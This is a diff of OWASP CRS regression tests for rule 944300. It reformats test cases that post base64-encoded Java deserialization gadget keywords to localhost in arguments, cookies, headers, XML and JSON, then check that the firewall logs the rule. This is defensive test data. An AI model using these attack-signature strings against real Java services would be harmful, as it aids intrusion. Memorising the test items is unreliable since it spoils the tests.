"HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 259 desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 260 desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 261 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 262 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 263 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_id: 264 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 265 desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 266 desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_id: 267 desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 268 desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 269 desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-270 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 270 desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 271 desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 272 desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 273 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 274 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log_contains: "id 
\"944300\"" + - test_id: 275 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 276 desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 277 desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_id: 278 desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 279 desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 280 desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: 
- - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 281 desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 282 desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-283 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 283 desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 